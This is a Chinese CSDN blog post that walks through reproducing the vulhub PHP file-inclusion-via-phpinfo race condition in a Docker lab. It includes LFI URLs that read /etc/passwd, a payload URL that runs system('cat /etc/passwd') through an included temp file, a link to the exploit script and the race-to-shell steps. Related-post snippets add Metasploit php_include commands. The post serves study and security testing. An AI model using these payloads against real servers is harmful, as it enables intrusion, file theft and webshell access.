这你不是你所常见的PHP文件包含漏洞(利用phpinfo)

最新推荐文章于 2024-03-05 15:51:03 发布
最新推荐文章于 2024-03-05 15:51:03 发布
阅读量1.3k 收藏 3
点赞数 1
文章标签: php web 安全 安全漏洞 云安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Adminxe/article/details/105907995
版权

0x01 前言

看到文件包含(+phpinfo ) 的问题,在上次众测中出现此题目,如果没打过CTF,可能真的很少见到这种问题,当然作为小白的我,也是很少遇到,毕竟都是第一次,那就来总结一波经验和操作,附赠EXP,借鉴网上大佬环境,进一步进行探索。

0x02 漏洞环境

执行如下命令启动环境:

docker-compose up -d

目标环境是官方最新版PHP7.2,说明该漏洞与PHP版本无关。

环境启动后,访问http://your-ip:8080/phpinfo.php即可看到一个PHPINFO页面,访问http://your-ip:8080/lfi.php?file=/etc/passwd,可见的确存在文件包含漏洞。

源码及其EXP地址:

https://github.com/vulhub/vulhub/tree/master/php/inclusion

0x03 漏洞复现

利用docker复现该漏洞,访问http://192.168.80.156:8080/phpinfo.php,可以看到页面出现phpinfo页面

再访问http://192.168.80.156:8080/lfi.php?file=/etc/passwd,可以看到该页面是存在文件包含漏洞的。

具体步骤:

在网上找的脚本:https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py

利用该脚本上传我们的恶意文件

接下来只要运行脚本就可以成功上传我们的文件了

http://192.168.80.156:8080/lfi.php?file=/tmp/g&1=system(%27cat%20/etc/passwd%27);

0x04 文件包含原理

先讲一下利用phpinfo上传文件,然后在文件包含的原理:

参考链接:https://github.com/vulhub/vulhub/tree/master/php/inclusion

在给PHP发送POST数据包时,如果数据包里包含文件区块,无论访问的代码中是否有处理文件上传的逻辑,php都会将这个文件保存成一个临时文件(通常是/tmp/php[6个随机字符]),这个临时文件在请求结束后就会被删除,同时,phpinfo页面会将当前请求上下文中所有变量都打印出来。但是文件包含漏洞和phpinfo页面通常是两个页面,理论上我们需要先发送数据包给phpinfo页面,然后从返回页面中匹配出临时文件名,将这个文件名发送给文件包含漏洞页面。

因为在第一个请求结束时,临时文件就会被删除,第二个请求就无法进行包含。

但是这并不代表我们没有办法去利用这点上传恶意文件,只要发送足够多的数据,让页面还未反应过来,就上传我们的恶意文件,然后文件包含:

1)发送包含了webshell的上传数据包给phpinfo,这个数据包的header,get等位置一定要塞满垃圾数据;

2)phpinfo这时会将所有数据都打印出来,其中的垃圾数据会将phpinfo撑得非常大

3)PHP默认缓冲区大小是4096,即PHP每次返回4096个字节给socket连接

4)所以,我们直接操作原生socket,每次读取4096个字节,只要读取到的字符里包含临时文件名,就立即发送第二个数据包

5)此时,第一个数据包的socket连接其实还没有结束,但是PHP还在继续每次输出4096个字节,所以临时文件还未被删除

6)我们可以利用这个时间差,成功包含临时文件,最后getshell

Adminxe
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
phpinfo漏洞信息利用
墨痕诉清风的博客
10-10 7420
libxml 2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,会导致XXE。向phpinfo()页面post一个shell(自己写一个上传页面),可以在_FILES[“file1”]中看到上传的临时文件,如果有个lfi,便可以直接getshell了。php标签有4种形式,如果这个选项不开启的话(一般默认不开启),使用asp的标签是不会解析的。还是标签的问题,允许这种形式,并且
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息
01-20
php.ini文件配置好后,zend路径也全部配置正确,但是phpinfo()还显示没有zend信息 查看zend的目录是否有user权限。默认即可。 isapi模式安装php,无法访问网站常见问题。 需要在php5isapi.dll上面添加user权限。 phpinfo没法运行 先看php配置的是否正确,不正确再看配置的是什么模式,cgi 或者isapi或者fastcgi模式,然后在查看配置文件php未找到该页 首先查看.php的扩展文件是否配置正确,然后在查看页面路径是否正确。 配置php错误 查看当前的php版本是多少版本的,是否需要安2008的vc++运行库。
PHPInfo()信息泄漏原理以及修复方法
最新发布
it知识分享 free for nothing..
03-05 829
PHPInfo()信息泄漏原理以及修复方法
laravel-phpinfo:Laravel PHP Info 是一个使用刀片模板提供 PHPInfo() 页面的包。 配置文件可用于启用身份验证保护并指定角色中间件
05-30
Laravel PHP 信息 Laravel PHP Info 是一个使用刀片模板提供页面的包。 配置文件可用于启用/禁用身份验证保护并指定角色中间件。 目录: 执照 Laravel PHP 信息 使用刀片模板轻松显示PHPInfo()页面 可以发布可定制的视图和资产 启用/禁用身份验证中间件 指定额外的中间件 配置选项 使用语言本地化文件 要求 Laravel 5.3、5.4、5.5、5.6、5.7、5.8、6、7 和 8+ 安装说明 从终端运行的项目根文件夹中: composer require jeremykenedy/laravel-phpinfo 注册包 Laravel 5.5 及更高版本使用包自动发现功能,无需编辑config/app.php文件。 Laravel 5.4 及以下在config/app.php providers下使用 laravel 注册包
解析如何屏蔽php中的phpinfo()函数
12-18
我们配置php环境的时候往往都会写phpinfo();这个函数来测试php环境是否安装成功,但往往这个函数也会给系统带来安全隐患,那么如何让关掉这个函数呢?下面介绍一种方法:修改php.ini文件,在里面找到如下行,复制代码 代码如下:disable_functions = ; This directive allows you to disable certain; functions for security reasons. It receives; a comma separated list of function names.; This directive is *NOT* af
CTFHub | PHPINFO
尼泊罗河伯的博客
10-03 1660
因为这题没有过多的提示,只是说明了 phpinfo ,点击查看页面发现 phpinfo 测试页面。原以为这题是一道大题,需要利用信息泄露找到跳转页面什么的。测试了好久都是 not found ,最后在接近网页末尾才发现一个名称为 ctfhub ,这才发现了此题 flag 居然隐藏在测试页面中。
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
sinat_61654365的博客
01-11 1234
PHP 环境下,如果网站存在本地文件包含漏洞,但是却无法找到想要包含的文件,也无法生成和上传文件是否能够获得 WebShell 呢?这里有一个技巧,前提是网站需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
文件包含漏洞
heizaier的博客
07-16 148
文件包含原理:就是在开发的时候未对包含的文件进行过滤,导致用户可以上传自己的图片木马而被当成php文件解析。 文件包含分类: 本地包含。 远程包含:需满足两个条件:allow_url_include=on、magic_quotes_gpc=off 如何快速挖包含漏洞:直接找源代码里面的4函数include(),include_once(),require()和require_once()。这2个涵数include(),include_once()...
PHP文件包含漏洞 Metasploit
课嗨教育的专栏
11-13 2201
原理: METASPLOIT生成PHP 或者PYTHON的DOOR EG: http://5.5.5.3:1111/1.txt 然后/lfi.php?file=http://5.5.5.3:1111/1.txt 启动METASPLOIT msf > use exploit/unix/webapp/php_include msf exploit(php_include) > set RHOST 5.5.5.2 RHOST => 5.5.5.2 msf exploit(php_in
vulhub PHP文件包含漏洞(利用phpinfo)复现
weixin_53696027的博客
03-04 731
通过docker搭建vulhub靶场来利用php文件包含漏洞
详解文件包含漏洞及其解决方法
2301_77004573的博客
04-29 1657
文件包含漏洞和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。注:(包含:程序开发人员通常会把可重复使用的函数写入到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写)例如我们在写c语言编程时的include就是个包含的应用。
phpinfo_feathersllf_zip_php_
09-30
just simple php info
PHP提示Warning:phpinfo() has been disabled函数禁用的解决方法
10-25
主要介绍了PHP提示Warning:phpinfo() has been disabled函数禁用的解决方法,涉及针对配置文件中禁用函数的修改技巧,非常具有实用价值,需要的朋友可以参考下
一文详解文件包含漏洞
MachineGunJoe666
06-10 1218
file:// #访问本地文件系统http:// #访问HTTPs网址ftp:// #访问ftp URLphp:// #访问输入输出流zlib:// #压缩流data:// #数据expect:// #处理交互式的流glob:// #查找匹配的文件路径。
CTF中phpinfo应注意什么
qq_45891669的博客
10-04 1808
phpinfo应注意什么 1.allow_url_fopen和allow_url_include 这个配置选项可以知道在PHP文件包含中可以使用哪些伪协议 2.PHP版本 3.open_basedir 这个配置选项可以知道PHP将访问目录限制在哪个目录下 4.disable_functions 可以在命令执行的时候,看那些函数被禁了 5.session session.save_path:session的上传目录 在linux系统中,session文件一般保存在以下几个目录: /var/
学习笔记-文件包含
m0_56171651的博客
08-19 1301
文件包含-学习笔记
PHP文件包含漏洞总结
坚持硬核
10-07 2864
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
PHP文件包含利用phpinfo写入shell
qq_63489512的博客
07-11 744
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当php文件来执行,这会为开发者节省大量的时间。这意味着可以创建供所有网页应用的标准页眉或者菜单文件。当页眉需要更新时,只需更新一个包含文件就可以了。当遇到PHP文件包含漏洞时,如果找不到可以包含的文件,可以通过包含临时文件来GetShell。由于临时文件文件名是随机的,如果目标网站存在phpinfo,则可以通过phpinfo来获取临时文件名,进而完成包含。
php文件包含漏洞利用phpinfo
06-28
### 回答1: PHP文件包含漏洞是一种常见Web安全漏洞,攻击者可以利用漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击者可以利用这些信息来进一步攻击服务器。因此,对于PHP文件包含漏洞,我们需要及时修复漏洞并加强服务器的安全防护措施,以保障网站的安全性。 ### 回答2: php文件包含漏洞是一种常见Web应用程序漏洞,它允许攻击者在没有正常访问权限的情况下获取Web应用程序的敏感数据和系统资源。利用phpinfo函数,攻击者可以获得关于Web服务器和PHP环境的详细信息,包括内存使用情况、PHP模块的版本、系统路径、配置文件名等等,这些信息可用于进一步攻击或收集有关系统的信息。 通常情况下,php文件包含漏洞产生的原因是由于Web应用程序没有正确的过滤和验证用户输入,并允许用户传递文件名或路径。如果攻击者可以在该位置输入恶意代码,他们就可以通过访问特定的URL,向web服务器请求文件或脚本来执行所需的操作。 对于php文件包含漏洞,攻击者可以利用phpinfo函数来获取大量有关Web服务器和PHP配置的信息。如果攻击者可以获取此信息,他们将更容易地了解Web服务器的配置和缺陷,从而定向和更容易地入侵目标系统。例如,攻击者可以使用所收集到的信息来寻找系统上的其他漏洞,或者在成功入侵后利用该信息来控制服务器,尝试使用系统权限执行任意代码或更改配置。 为了保护Web应用程序安全,我们可以采取以下措施来防止php文件包含漏洞的发生: 1. 使用安全的编程实践来避免不可信数据输入 2. 防止对敏感资源和服务器配置文件的读取 3. 激活PHP配置参数,如open_basedir,以限制PHP访问的目录 4. 限制Web服务器的目录访问权限 5. 定期检查服务器日志来检测异常行为和攻击行为 6. 采用安全的编程方法避免可能的错误,并保持对最新漏洞安全威胁的关注 php文件包含漏洞可能会导致非常严重的安全问题,所以应采取有效的措施来保护Web应用程序和服务器的安全。通过实践良好的编程实践和安全性控制策略,可以帮助我们保护Web应用程序不受恶意攻击的影响,从而确保我们的数据和系统的安全性。 ### 回答3: PHP文件包含漏洞是一种常见的网络安全漏洞。它的存在导致黑客可以利用这个漏洞通过访问包含文件来执行任意代码并控制整个服务器。 PHP文件包含漏洞的根源在于PHP提供了一种方便的方式来包含另一个文件中的代码,这种方式是通过 include() 或 require() 函数实现的。这些函数接受一个文件名作为参数,然后将该文件中的代码“拷贝并粘贴”到当前的PHP文件中。这个机制的漏洞是黑客可以通过传递带有恶意代码的参数来包含任意文件,这可能是远程服务器上的PHP脚本,也可能是包含恶意代码的本地文件PHPInfo是一个php的系统信息函数,负责显示PHP配置和环境信息。这里,黑客可以利用PHPInfo来寻找服务器的弱点,并进一步利用php文件包含漏洞。通过读入php.ini一个配置文件,该函数可以泄漏服务器的所有信息,包括文件路径、数据库密码、服务器版本、PHP版本等等。 黑客可以通过以下步骤来利用php文件包含漏洞phpinfo()函数进一步渗透服务器: 1. 使用phpinfo()函数来获取服务器的系统信息和配置信息 2. 解析得到的信息,寻找PHP文件包含漏洞的存在 3. 通过向include()或require()函数传递恶意文件来执行任意代码并控制服务器 为了避免这些漏洞PHP开发者应该始终验证来自用户的输入。对于文件包含,应该限制包含文件的范围,禁止包含远程文件,并使用白名单来确定包含文件的位置。同时,应该禁用phpinfo()函数或者确保它只在受信任的环境中使用。 维护者还可以使用一些工具例如模糊测试技术、代码审计等来发现并修复这些漏洞。实施彻底的安全措施对于预防这些漏洞的产生非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值